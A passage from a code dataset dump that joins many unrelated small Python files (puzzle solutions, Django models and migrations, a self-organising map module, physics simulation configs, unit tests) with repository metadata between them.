for idy, field in enumerate(passports[idx]):
before_colon = re.compile(r"^[^:]+:")
[requirement] = before_colon.findall(field)
passports[idx][idy] = requirement[:-1]
for txt_block in passports:
if (sorted(txt_block) == sorted(req)) or (sorted(txt_block) == sorted(reqc)):
counter += 1
return counter
if __name__ == "__main__":
print(solve(input))
|
[
"LilySu@users.noreply.github.com"
] |
LilySu@users.noreply.github.com
|
fd4b9bbad032fd93f0ca1ccbfe850ab51f7e941f
|
487ce91881032c1de16e35ed8bc187d6034205f7
|
/codes/CodeJamCrawler/16_0_2/babpls/pancake.py
|
d28c2b437d135f52472fcf97a0e7317ca7ed9438
|
[] |
no_license
|
DaHuO/Supergraph
|
9cd26d8c5a081803015d93cf5f2674009e92ef7e
|
c88059dc66297af577ad2b8afa4e0ac0ad622915
|
refs/heads/master
| 2021-06-14T16:07:52.405091
| 2016-08-21T13:39:13
| 2016-08-21T13:39:13
| 49,829,508
| 2
| 0
| null | 2021-03-19T21:55:46
| 2016-01-17T18:23:00
|
Python
|
UTF-8
|
Python
| false
| false
| 324
|
py
|
fin = open('pancake.in', 'r')
fout = open('pancake.out', 'w')
count = 0
for line in fin:
if count != 0:
out = 0
cur = '+'
for x in line[:-1][::-1]:
if cur != x:
cur = x
out += 1
fout.write('Case #%d: %s\n' % (count, str(out)))
count += 1
|
[
"[dhuo@tcd.ie]"
] |
[dhuo@tcd.ie]
|
ca694b19b1ddaa3393d91190f4addb316c5fd96e
|
8240abd177ece3a1cf2d753cc5694c1fec478709
|
/week1/codeingBat/list-2/04.py
|
def4b4029205be7d5c428af84f9eba1616343dda
|
[] |
no_license
|
DastanB/BF-Django
|
255001185d8a8318bd19b750fe662a7f86b64d92
|
adcd1d968b94ea5097fd3d03338f031d5497d463
|
refs/heads/master
| 2022-10-27T06:44:56.648527
| 2018-11-24T18:33:35
| 2018-11-24T18:33:35
| 147,125,321
| 1
| 1
| null | 2022-10-19T08:22:54
| 2018-09-02T22:07:22
|
Python
|
UTF-8
|
Python
| false
| false
| 242
|
py
|
def sum13(nums):
sum = 0
for i in range (len(nums)):
if nums[i] != 13:
sum += nums[i]
elif nums[i] == 13 and i < len(nums)-1:
nums[i]=0;
nums[i+1] =0
return sum
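
# Added usage note (not part of the original exercise file): sum13 sums the list while
# skipping every 13 and the number immediately after it, e.g.
#   sum13([1, 2, 2, 1, 13])           # -> 6
#   sum13([13, 1, 2, 13, 2, 1, 13])   # -> 3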
|
[
"dastan211298@gmail.com"
] |
dastan211298@gmail.com
|
96b80fdd8c80d38fff3348a20ed3e1d9e961fbd0
|
7356f77784c9ad3ffb3da4b3b60d844b23bb7b29
|
/dt_automator/maker/model/scene.py
|
3af1bfa5266ca3679ea24f3ea9652d3b6e46778b
|
[] |
no_license
|
HsOjo/DTAutomator
|
5cc513e41a3eba0a595bb410bcee6ff990140805
|
d51c31ea04a79ed767f661ab0f9599b1c0f0bcef
|
refs/heads/master
| 2021-02-13T00:59:06.424434
| 2020-05-03T04:34:12
| 2020-05-03T04:34:12
| 244,647,246
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 669
|
py
|
from typing import List
from dt_automator.base.model import BaseModel
from .feature import FeatureModel
from .object import ObjectModel
class SceneModel(BaseModel):
_sub_model = dict(
features=(list, FeatureModel),
objects=(list, ObjectModel),
)
def __init__(self, event: dict):
self._event = event
self.name = ''
self.img = ''
self.features = [] # type: List[FeatureModel]
self.objects = [] # type: List[ObjectModel]
@property
def img_path(self):
return self._event['get_path'](self.img)
def __repr__(self):
return '<%s %s>' % (self.__class__.__name__, self.name)
|
[
"1134031392@qq.com"
] |
1134031392@qq.com
|
fbb829ca8e1fb3c025af62444ebef149db9b56ce
|
07996c7f93e7b200146cd314520100cf99d003bd
|
/raw data/40_tos_with_paragraph/code/crawlParagraph/new-env/bin/conch
|
4090c800e7522412274480e3f813286e46384855
|
[] |
no_license
|
tjuyanghw/data_policy_analyzer
|
31ae683128ca5241fa8f0cb67e2f1132820c2d02
|
010a44ff024bd6d97b21f409f6c62f969e1fdc55
|
refs/heads/master
| 2022-07-02T19:23:14.141170
| 2020-05-13T16:24:11
| 2020-05-13T16:24:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 442
|
#!/Users/huthvincent/Desktop/scrapy/scrapyenv/crawlByOnce/new-env/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'Twisted==19.10.0','console_scripts','conch'
__requires__ = 'Twisted==19.10.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('Twisted==19.10.0', 'console_scripts', 'conch')()
)
|
[
"xiaoyue10131748@gmail.com"
] |
xiaoyue10131748@gmail.com
|
|
1f2e7b1fdb24d899b19051ed50eaeaf5aeeb8f4e
|
b3fd61fdfd6ea82695d805c95321619423b836e6
|
/Tom_Sawyer.py
|
02e8482d4f8b2e35842c340ef85ed059753499c5
|
[] |
no_license
|
sjogleka/General_codes
|
761967fd1175c97804d49290af9db10828d4900f
|
2772ea7b723c4ca680864b40b41fd34cc197726d
|
refs/heads/master
| 2021-07-16T07:41:05.841942
| 2020-10-14T01:49:12
| 2020-10-14T01:49:12
| 218,369,391
| 7
| 8
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 312
|
py
|
def countWays(arr, n):
pos = [0 for i in range(n)]
p = 0
for i in range(n):
if (arr[i] == 1):
pos[p] = i + 1
p += 1
if (p == 0):
return 0
ways = 1
for i in range(p - 1):
ways *= pos[i + 1] - pos[i]
return ways
print(countWays([0,1],2))
|
[
"sjogleka@uncc.edu"
] |
sjogleka@uncc.edu
|
9e6e89a22d2678d31373d33e7f817a66b671619b
|
dcc491dd2fa4ece68728255d236fa6e784eef92d
|
/modules/2.78/bpy/ops/outliner.py
|
0825988f0ade8aa85899d877be01bb396b376431
|
[
"MIT"
] |
permissive
|
cmbasnett/fake-bpy-module
|
a8e87d5a95d075e51133307dfb55418b94342f4f
|
acb8b0f102751a9563e5b5e5c7cd69a4e8aa2a55
|
refs/heads/master
| 2020-03-14T16:06:29.132956
| 2018-05-13T01:29:55
| 2018-05-13T01:29:55
| 131,691,143
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,671
|
py
|
def action_set(action=''):
pass
def animdata_operation(type='CLEAR_ANIMDATA'):
pass
def constraint_operation(type='ENABLE'):
pass
def data_operation(type='SELECT'):
pass
def drivers_add_selected():
pass
def drivers_delete_selected():
pass
def expanded_toggle():
pass
def group_link(object="Object"):
pass
def group_operation(type='UNLINK'):
pass
def id_delete():
pass
def id_operation(type='UNLINK'):
pass
def id_remap(id_type='OBJECT', old_id='', new_id=''):
pass
def item_activate(extend=True, recursive=False):
pass
def item_openclose(all=True):
pass
def item_rename():
pass
def keyingset_add_selected():
pass
def keyingset_remove_selected():
pass
def lib_operation(type='RENAME'):
pass
def lib_relocate():
pass
def material_drop(object="Object", material="Material"):
pass
def modifier_operation(type='TOGVIS'):
pass
def object_operation(type='SELECT'):
pass
def operation():
pass
def orphans_purge():
pass
def parent_clear(dragged_obj="Object", type='CLEAR'):
pass
def parent_drop(child="Object", parent="Object", type='OBJECT'):
pass
def renderability_toggle():
pass
def scene_drop(object="Object", scene="Scene"):
pass
def scene_operation(type='DELETE'):
pass
def scroll_page(up=False):
pass
def select_border(gesture_mode=0, xmin=0, xmax=0, ymin=0, ymax=0):
pass
def selectability_toggle():
pass
def selected_toggle():
pass
def show_active():
pass
def show_hierarchy():
pass
def show_one_level(open=True):
pass
def visibility_toggle():
pass
|
[
"nutti.metro@gmail.com"
] |
nutti.metro@gmail.com
|
6daa0f6ca0ec15a3661dc69769cc530be5110fb4
|
ecbc312f6c5733a4c8ebcc9c3fccdba8bc35fd2f
|
/text_normalizer/collection/eng_basic.py
|
0432800ebf5e9c3e77fbc5fa67ff71ed84217fbd
|
[
"MIT"
] |
permissive
|
Yoctol/text-normalizer
|
d200a4e020618e70162cbc52a3099d9a9203aab9
|
3609c10cd229c08b4623531e82d2292fc370734c
|
refs/heads/master
| 2020-03-11T00:56:25.337539
| 2018-11-06T04:08:37
| 2018-11-06T04:08:37
| 129,676,388
| 17
| 3
|
MIT
| 2018-11-06T04:08:38
| 2018-04-16T02:57:34
|
Python
|
UTF-8
|
Python
| false
| false
| 439
|
py
|
from .base_collection import BaseCollection
from ..library import (
whitespace_char_text_normalizer,
pure_strip_text_normalizer,
eng_lowercase_text_normalizer,
)
eng_basic_text_normalizer_collection = BaseCollection()
eng_basic_text_normalizer_collection.add_text_normalizers(
text_normalizers=[
eng_lowercase_text_normalizer,
whitespace_char_text_normalizer,
pure_strip_text_normalizer,
],
)
|
[
"s916526000@gmail.com"
] |
s916526000@gmail.com
|
211dc4152498ce7967b1fc4828f9e7be31a98caf
|
e23a4f57ce5474d468258e5e63b9e23fb6011188
|
/125_algorithms/_exercises/templates/_algorithms_challenges/leetcode/LeetCode_with_solution/096_Unique_Binary_Search_Trees.py
|
6b846c2a2a8141cdb599d93d5826000dc142e497
|
[] |
no_license
|
syurskyi/Python_Topics
|
52851ecce000cb751a3b986408efe32f0b4c0835
|
be331826b490b73f0a176e6abed86ef68ff2dd2b
|
refs/heads/master
| 2023-06-08T19:29:16.214395
| 2023-05-29T17:09:11
| 2023-05-29T17:09:11
| 220,583,118
| 3
| 2
| null | 2023-02-16T03:08:10
| 2019-11-09T02:58:47
|
Python
|
UTF-8
|
Python
| false
| false
| 419
|
py
|
class Solution(object):
    def numTrees(self, n):
        """
        :type n: int
        :rtype: int
        """
        # https://leetcode.com/discuss/86650/fantastic-clean-java-dp-solution-with-detail-explaination
        # dp[i] = number of structurally unique BSTs storing the values 1..i
        dp = [0] * (n + 1)
        dp[0] = 1
        dp[1] = 1
        for level in range(2, n + 1):
            for root in range(1, level + 1):
                dp[level] += dp[level - root] * dp[root - 1]
        return dp[n]
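
# Added usage note (not part of the original solution file): dp[n] is the n-th Catalan
# number, so e.g. there are 5 unique BSTs on 3 nodes and 14 on 4 nodes.
if __name__ == '__main__':
    assert Solution().numTrees(3) == 5
    assert Solution().numTrees(4) == 14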
|
[
"sergejyurskyj@yahoo.com"
] |
sergejyurskyj@yahoo.com
|
403157814d970ad27e47a62924b88c665308ac35
|
a1b375c3e98fe059dafc4d74cbcbcb99a0571e44
|
/accounts/migrations/0001_initial.py
|
ffea45cf723bf87cb80e5a6a39898021cf2970d0
|
[
"MIT"
] |
permissive
|
mohsenamoon1160417237/Social_app
|
478a73552ceed8001c167be6caaf550cd58626bd
|
79fa0871f7b83648894941f9010f1d99f1b27ab3
|
refs/heads/master
| 2022-12-09T16:03:53.623506
| 2020-09-21T05:59:22
| 2020-09-21T06:02:03
| 297,242,915
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 833
|
py
|
# Generated by Django 2.2 on 2020-09-10 17:48
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Profile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=50)),
('last_name', models.CharField(max_length=50)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='profile', to=settings.AUTH_USER_MODEL)),
],
),
]
|
[
"dramatic225@gmail.com"
] |
dramatic225@gmail.com
|
e6a83c518c0ad5a0e277d860ea3388efff7b2f63
|
44a7330dfa4fe321eb432ee57a32328578dec109
|
/milk/unsupervised/som.py
|
abe3f6dbe5b47773ecfa3cb5f58852d2d220e17f
|
[
"MIT"
] |
permissive
|
tzuryby/milk
|
7cb6760fad600e9e0d0c9216dc749db289b596fb
|
a7159b748414d4d095741978fb994c4affcf6b9b
|
refs/heads/master
| 2020-12-29T02:45:33.044864
| 2011-03-15T20:23:29
| 2011-03-15T20:25:11
| 1,485,748
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,261
|
py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2010, Luis Pedro Coelho <lpc@cmu.edu>
# vim: set ts=4 sts=4 sw=4 expandtab smartindent:
# License: MIT. See COPYING.MIT file in the milk distribution
from __future__ import division
import numpy as np
from ..utils import get_pyrandom
from . import _som
def putpoints(grid, points, L=.2, radius=4, iterations=1, shuffle=True, R=None):
'''
putpoints(grid, points, L=.2, radius=4, iterations=1, shuffle=True, R=None)
Feeds elements of `points` into the SOM `grid`
Parameters
----------
grid : ndarray
Self organising map
points : ndarray
data to feed to array
L : float, optional
How much to influence neighbouring points (default: .2)
radius : integer, optional
Maximum radius of influence (in L_1 distance, default: 4)
iterations : integer, optional
Number of iterations
shuffle : boolean, optional
Whether to shuffle the points before each iterations
R : source of randomness
'''
if radius is None:
radius = 4
if type(L) != float:
raise TypeError("milk.unsupervised.som: L should be floating point")
if type(radius) != int:
raise TypeError("milk.unsupervised.som: radius should be an integer")
if grid.dtype != np.float32:
raise TypeError('milk.unsupervised.som: only float32 arrays are accepted')
if points.dtype != np.float32:
raise TypeError('milk.unsupervised.som: only float32 arrays are accepted')
if len(grid.shape) == 2:
grid = grid.reshape(grid.shape+(1,))
if shuffle:
random = get_pyrandom(R)
for i in xrange(iterations):
if shuffle:
random.shuffle(points)
_som.putpoints(grid, points, L, radius)
def closest(grid, f):
'''
y,x = closest(grid, f)
Finds the coordinates of the closest point in the `grid` to `f`
::
y,x = \\argmin_{y,x} { || grid[y,x] - f ||^2 }
Parameters
----------
grid : ndarray of shape Y,X,J
self-organised map
f : ndarray of shape J
point
Returns
-------
y,x : integers
coordinates into `grid`
'''
delta = grid - f
delta **= 2
delta = delta.sum(2)
return np.unravel_index(delta.argmin(), delta.shape)
def som(data, shape, iterations=1000, L=.2, radius=4, R=None):
'''
grid = som(data, shape, iterations=1000, L=.2, radius=4, R=None):
Self-organising maps
Parameters
----------
points : ndarray
data to feed to array
shape : tuple
Desired shape of output. Must be 2-dimensional.
L : float, optional
How much to influence neighbouring points (default: .2)
radius : integer, optional
Maximum radius of influence (in L_1 distance, default: 4)
iterations : integer, optional
Number of iterations
R : source of randomness
Returns
-------
grid : ndarray
Map
'''
R = get_pyrandom(R)
d = data.shape[1]
if data.dtype != np.float32:
data = data.astype(np.float32)
grid = np.array(R.sample(data, np.product(shape))).reshape(shape + (d,))
putpoints(grid, data, L=L, radius=radius, iterations=iterations, shuffle=True, R=R)
return grid
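
if __name__ == '__main__':
    # Added usage sketch (not part of the milk distribution): exercises som() and closest()
    # defined above on random float32 data; the grid shape and iteration count are arbitrary,
    # and running it assumes the compiled _som extension is available.
    data = np.random.rand(500, 3).astype(np.float32)
    grid = som(data, (8, 8), iterations=10)
    y, x = closest(grid, data[0])
    print('closest cell for the first point: (%d, %d)' % (y, x))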
|
[
"lpc@cmu.edu"
] |
lpc@cmu.edu
|
54f59acba3e28e9e73601f99667ca553cc1f9529
|
738b6d6ec4572f5848940b6adc58907a03bda6fb
|
/tests/nutmeg4_pymcell4/0625_prob_changed_notification_disabled/model.py
|
bb49dac21464576f72e6b5d1f13578c087a464db
|
[
"Unlicense",
"LicenseRef-scancode-public-domain",
"MIT"
] |
permissive
|
mcellteam/mcell_tests
|
09cd1010a356e0e07c88d7e044a73c5606c6e51a
|
34d2d967b75d56edbae999bf0090641850f4f4fe
|
refs/heads/master
| 2021-12-24T02:36:24.987085
| 2021-09-24T14:19:41
| 2021-09-24T14:19:41
| 174,733,926
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,015
|
py
|
#!/usr/bin/env python3
import sys
import os
MCELL_PATH = os.environ.get('MCELL_PATH', '')
if MCELL_PATH:
sys.path.append(os.path.join(MCELL_PATH, 'lib'))
else:
print("Error: variable MCELL_PATH that is used to find the mcell library was not set.")
sys.exit(1)
import mcell as m
params = m.bngl_utils.load_bngl_parameters('test.bngl')
ITERATIONS = int(params['ITERATIONS'])
DUMP = True
EXPORT_DATA_MODEL = True
# ---- load bngl file ----
model = m.Model()
model.load_bngl('test.bngl')
rxn = model.find_reaction_rule('rxn')
assert(rxn)
var_rate_react_a_plus_b = [
[0, 0],
[1e-05, 9.98334e+06],
[2e-05, 1.98669e+07],
[3e-05, 2.9552e+07],
[4e-05, 3.89418e+07],
[5e-05, 4.79426e+07],
[6e-05, 5.64642e+07]
]
rxn.variable_rate = var_rate_react_a_plus_b
# ---- configuration ----
model.config.total_iterations = ITERATIONS
model.notifications.rxn_probability_changed = False
model.initialize()
#model.dump_internal_state()
model.run_iterations(ITERATIONS)
model.end_simulation()
|
[
"ahusar@salk.edu"
] |
ahusar@salk.edu
|
8bde1e7c8d3f15fa84f32773e315e26557bde33f
|
6c816f19d7f4a3d89abbb00eeaf43dd818ecc34f
|
/apps/detailQuestion/migrations/0001_initial.py
|
f55e7aa24232e3c288aacd4cef66e2d65e699b32
|
[] |
no_license
|
reo-dev/bolt
|
29ee6aa7cfc96bd50fa7a7dae07fbaafc2125e54
|
d1a7859dd1ebe2f5b0e6e295047b620f5afdb92e
|
refs/heads/master
| 2023-07-13T04:05:57.856278
| 2021-08-27T09:07:03
| 2021-08-27T09:07:03
| 382,195,547
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,297
|
py
|
# Generated by Django 3.0.8 on 2021-01-12 02:20
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
('project', '0013_proposaltype_name'),
]
operations = [
migrations.CreateModel(
name='DetailQuestionTitle',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('question', models.TextField(verbose_name='질문제목')),
('createdAt', models.DateTimeField(default=django.utils.timezone.now, verbose_name='작성일')),
],
options={
'verbose_name': ' 질문제목',
'verbose_name_plural': ' 질문제목',
},
),
migrations.CreateModel(
name='DetailQuestionSelect',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('select', models.TextField(verbose_name='질문 선택지')),
('createdAt', models.DateTimeField(default=django.utils.timezone.now, verbose_name='작성일')),
('title', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='detailQuestion.DetailQuestionTitle', verbose_name='질문제목')),
],
),
migrations.CreateModel(
name='DetailQuestionSave',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('createdAt', models.DateTimeField(default=django.utils.timezone.now, verbose_name='작성일')),
('question', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='detailQuestion.DetailQuestionTitle', verbose_name='질문제목')),
('request', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='project.Request', verbose_name='의뢰서')),
('select', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='detailQuestion.DetailQuestionSelect', verbose_name='질문 선택지')),
],
),
]
|
[
"75593016+reo-dev@users.noreply.github.com"
] |
75593016+reo-dev@users.noreply.github.com
|
a88524be820b8141ba2700ef02283fe69fe301c4
|
39bc55c2a4457bbe7ff4136ea660a29ff88ee66d
|
/skued/simulation/tests/test_structure_factors.py
|
7513665650da42ed29e663bb4456ea09438f61dd
|
[
"MIT"
] |
permissive
|
KOLANICH-physics/scikit-ued
|
c72b3219e547e33ae067c5d36a93439d2f9045e2
|
c13472129df33105312b57427ce588e66d20391f
|
refs/heads/master
| 2022-01-22T05:47:04.286449
| 2018-09-24T15:06:00
| 2018-09-24T15:06:00
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,918
|
py
|
# -*- coding: utf-8 -*-
import unittest
import numpy as np
from random import randint
from .. import structure_factor, bounded_reflections, affe
from ... import Crystal, Atom
class TestElectronFormFactor(unittest.TestCase):
def test_side_effects(self):
nG = np.random.random(size = (16, 32))
nG.setflags(write = False) # if nG is written to, Exception is raised
affe(Atom('He', coords = [0,0,0]), nG)
def test_out_shape(self):
nG = np.random.random(size = (16, 32))
eff = affe(Atom('He', coords = [0,0,0]), nG)
self.assertSequenceEqual(eff.shape, nG.shape)
def test_int(self):
""" Test that affe(int, ...) also works """
atomic_number = randint(1, 103)
nG = np.random.random(size = (16, 32))
from_int = affe(atomic_number, nG)
from_atom = affe(Atom(atomic_number, [0,0,0]), nG)
self.assertTrue(np.allclose(from_int, from_atom))
def test_str(self):
""" Test that affe(str, ...) also works """
# Try with Chlorine (Z = 17)
atomic_number = 17
nG = np.random.random(size = (16, 32))
from_int = affe(atomic_number, nG)
from_str = affe('Cl', nG)
self.assertTrue(np.allclose(from_int, from_str))
class TestStructureFactor(unittest.TestCase):
def setUp(self):
self.crystal = Crystal.from_database(next(iter(Crystal.builtins)))
def test_shape_and_dtype(self):
""" Test that output of structure_factor is same shape as input,
and that the dtype is complex """
h, k, l = np.meshgrid([1, 2, 3], [1, 2, 3], [1, 2, 3])
sf = structure_factor(self.crystal, h, k, l)
self.assertSequenceEqual(sf.shape, h.shape)
self.assertEqual(sf.dtype, np.complex)
class TestBoundedReflections(unittest.TestCase):
def setUp(self):
self.crystal = Crystal.from_database(next(iter(Crystal.builtins)))
def test_bounded_reflections_negative(self):
""" Test that negative reflection bounds raise an Exception.
Otherwise, an infinite number of reflections will be generated """
with self.assertRaises(ValueError):
hkl = list(bounded_reflections(self.crystal, -1))
def test_bounded_reflections_zero(self):
""" Check that bounded_reflections returns (000) for a zero bound """
h, k, l = bounded_reflections(self.crystal,0)
[self.assertEqual(len(i), 1) for i in (h, k, l)]
[self.assertEqual(i[0], 0) for i in (h, k, l)]
def test_bounded_reflections_all_within_bounds(self):
""" Check that every reflection is within the bound """
bound = 10
Gx, Gy, Gz = self.crystal.scattering_vector(*bounded_reflections(self.crystal,nG = bound))
norm_G = np.sqrt(Gx**2 + Gy**2 + Gz**2)
self.assertTrue(np.all(norm_G <= bound))
if __name__ == '__main__':
unittest.main()
|
[
"laurent.decotret@outlook.com"
] |
laurent.decotret@outlook.com
|
de4798e70d7c9c101c756128701b3dde305bd873
|
006ff11fd8cfd5406c6f4318f1bafa1542095f2a
|
/Validation/CheckOverlap/test/python/runFP420_cfg.py
|
bb8cd03847118c55541afbb0a89d58fb4eb5fa73
|
[] |
permissive
|
amkalsi/cmssw
|
8ac5f481c7d7263741b5015381473811c59ac3b1
|
ad0f69098dfbe449ca0570fbcf6fcebd6acc1154
|
refs/heads/CMSSW_7_4_X
| 2021-01-19T16:18:22.857382
| 2016-08-09T16:40:50
| 2016-08-09T16:40:50
| 262,608,661
| 0
| 0
|
Apache-2.0
| 2020-05-09T16:10:07
| 2020-05-09T16:10:07
| null |
UTF-8
|
Python
| false
| false
| 2,204
|
py
|
import FWCore.ParameterSet.Config as cms
process = cms.Process("PROD")
process.load("SimGeneral.HepPDTESSource.pdt_cfi")
process.load("Geometry.CMSCommonData.cmsAllGeometryXML_cfi")
process.load("Geometry.TrackerNumberingBuilder.trackerNumberingGeometry_cfi")
process.load("Geometry.MuonNumbering.muonNumberingInitialization_cfi")
process.load("SimG4Core.Application.g4SimHits_cfi")
process.MessageLogger = cms.Service("MessageLogger",
destinations = cms.untracked.vstring('cout'),
categories = cms.untracked.vstring('G4cout', 'G4cerr'),
cout = cms.untracked.PSet(
default = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
G4cout = cms.untracked.PSet(
limit = cms.untracked.int32(-1)
),
G4cerr = cms.untracked.PSet(
limit = cms.untracked.int32(-1)
)
),
)
process.RandomNumberGeneratorService = cms.Service("RandomNumberGeneratorService",
moduleSeeds = cms.PSet(
generator = cms.untracked.uint32(456789),
g4SimHits = cms.untracked.uint32(9876),
VtxSmeared = cms.untracked.uint32(12345)
),
sourceSeed = cms.untracked.uint32(98765)
)
process.source = cms.Source("EmptySource")
process.generator = cms.EDProducer("FlatRandomEGunProducer",
PGunParameters = cms.PSet(
PartID = cms.vint32(14),
MinEta = cms.double(-3.5),
MaxEta = cms.double(3.5),
MinPhi = cms.double(-3.14159265359),
MaxPhi = cms.double(3.14159265359),
MinE = cms.double(9.99),
MaxE = cms.double(10.01)
),
AddAntiParticle = cms.bool(False),
Verbosity = cms.untracked.int32(0),
firstRun = cms.untracked.uint32(1)
)
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1)
)
process.p1 = cms.Path(process.generator*process.g4SimHits)
process.g4SimHits.UseMagneticField = False
process.g4SimHits.Physics.type = 'SimG4Core/Physics/DummyPhysics'
process.g4SimHits.Physics.DummyEMPhysics = True
process.g4SimHits.Watchers = cms.VPSet(cms.PSet(
type = cms.string('CheckOverlap'),
Resolution = cms.untracked.int32(1000),
NodeNames = cms.untracked.vstring('FP420E')
))
|
[
"giulio.eulisse@gmail.com"
] |
giulio.eulisse@gmail.com
|
442bf86ccac1d097b67f928e10a2d28a7d1a246a
|
390a9771799a8264b3c0c8c61cc7e1bf97ef2d79
|
/day23.py
|
ee7b0c961b026c7a9198fb1b34e91d632c061fa0
|
[] |
no_license
|
Goldenlion5648/AdventOfCode2017
|
2bbf96d03017eceaac1279413dc3387359d03a6f
|
482f2c0d5eba49a29c4631ea131753945cfe3baa
|
refs/heads/master
| 2022-12-12T06:20:41.812048
| 2020-09-19T05:08:35
| 2020-09-19T05:08:35
| 289,359,883
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,833
|
py
|
from collections import Counter
a='''set b 99
set c b
jnz a 2
jnz 1 5
mul b 100
sub b -100000
set c b
sub c -17000
set f 1
set d 2
set e 2
set g d
mul g e
sub g b
jnz g 2
set f 0
sub e -1
set g e
sub g b
jnz g -8
sub d -1
set g d
sub g b
jnz g -13
jnz f 2
sub h -1
set g b
sub g c
jnz g 2
jnz 1 3
sub b -17
jnz 1 -23'''
positions = Counter([chr(i) for i in range(97, 97 + 8)])
for i in positions:
positions[i] -= 1
print(positions)
instructs = a.split("\n")
curInstruct = 0
# for i in instructs:
count = 0
while curInstruct < len(instructs):
i = instructs[curInstruct]
inst, b, c = i.split(" ")
jumped = False
try:
b = int(b)
except:
pass
try:
c = int(c)
except:
pass
if inst == "set":
if type(b) == type(2):
            positions[chr(b + 97)] = c if type(c) == type(3) else positions[c]
else:
positions[b] = c if type(c) == type(3) else positions[c]
elif inst == "sub":
if type(b) == type(2):
            positions[chr(b + 97)] -= c if type(c) == type(3) else positions[c]
else:
positions[b] -= c if type(c) == type(3) else positions[c]
elif inst == "mul":
if type(b) == type(2):
            positions[chr(b + 97)] *= c if type(c) == type(3) else positions[c]
else:
positions[b] *= c if type(c) == type(3) else positions[c]
count += 1
elif inst == "jnz":
if type(b) == type(2):
if b != 0:
curInstruct += c if type(c) == type(3) else positions[c]
jumped = True
else:
if positions[b] != 0:
curInstruct += c if type(c) == type(3) else positions[c]
jumped = True
if jumped == False:
curInstruct += 1
print(count)
#part 1 done in 16:57, worked first try
|
[
"coboudinot@gmail.com"
] |
coboudinot@gmail.com
|
88917a546cf6b78403ff35ece587c512e0f076ee
|
622a338ee1f856e542e14757b761546aa4267604
|
/confu/isa.py
|
ddfa5a58dfcb9268fd62c9b758090d785344f16b
|
[
"MIT"
] |
permissive
|
Maratyszcza/confu
|
ad8f30998d6d6ed4b37b72b6d63b7fd8ba549f1d
|
4f3d0e73d20dbae54c154817d70f74b6a63940e1
|
refs/heads/master
| 2023-06-05T15:49:05.476642
| 2020-04-12T20:00:19
| 2020-04-12T20:14:52
| 79,974,006
| 14
| 14
|
MIT
| 2020-01-06T22:34:03
| 2017-01-25T01:55:44
|
Python
|
UTF-8
|
Python
| false
| false
| 1,086
|
py
|
from copy import copy
class InstructionSet:
def __init__(self, tags=None, generate_flags_fn=None):
if tags is None:
self.tags = set()
elif isinstance(tags, str):
self.tags = set((tags,))
else:
self.tags = set(tags)
self.generate_flags = generate_flags_fn
def get_flags(self, compiler):
if self.generate_flags is not None:
return self.generate_flags(self.tags, compiler)
else:
return list()
def __str__(self):
return self.name
def __add__(self, instruction_set):
if not isinstance(instruction_set, InstructionSet):
raise TypeError("Invalid instruction set type; InstructionSet expected")
if self.generate_flags is not None and self.generate_flags is not instruction_set.generate_flags:
raise ValueError("Instruction sets %s and %s are mutually incompatible" %
(self.tags[-1], instruction_set.tags[0]))
return InstructionSet(self.tags.union(instruction_set.tags), self.generate_flags)
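
# Added usage sketch (not from the confu source): the tag names and the flag-generating
# callback below are illustrative assumptions, not real confu API surface.
if __name__ == "__main__":
    def gcc_like_flags(tags, compiler):
        # hypothetical helper: map ISA tags to compiler flags
        return ["-m" + tag for tag in sorted(tags)]

    avx = InstructionSet("avx", generate_flags_fn=gcc_like_flags)
    fma = InstructionSet("fma", generate_flags_fn=gcc_like_flags)
    combined = avx + fma
    print(combined.get_flags(compiler=None))  # e.g. ['-mavx', '-mfma']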
|
[
"maratek@gmail.com"
] |
maratek@gmail.com
|
5247e05fedc3b4010c1fd05918da47a596108f5a
|
0b480b28455d4ea133eaeec5625e2ce62660dbb1
|
/populate_rango.py
|
c872d3fa71f07dc547fc08034fa6175d00d97eca
|
[] |
no_license
|
jtr109/tango_with_django_exercise
|
8ff6c05321be8ca614a550abc6c66aef55886136
|
ce2aa7c5a12eae0352b435dc726bef4e378ef3c5
|
refs/heads/master
| 2020-09-22T09:28:34.217081
| 2016-08-30T02:49:35
| 2016-08-30T02:49:35
| 66,900,401
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,374
|
py
|
import os
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'tango_with_django_project.settings')
import django
django.setup()
from rango.models import Category, Page
def populate():
python_cat = add_cat(name='Python',
views=128, likes=64)
add_page(cat=python_cat,
title="Official Python Tutorial",
url="http://docs.python.org/2/tutorial/",
views=16)
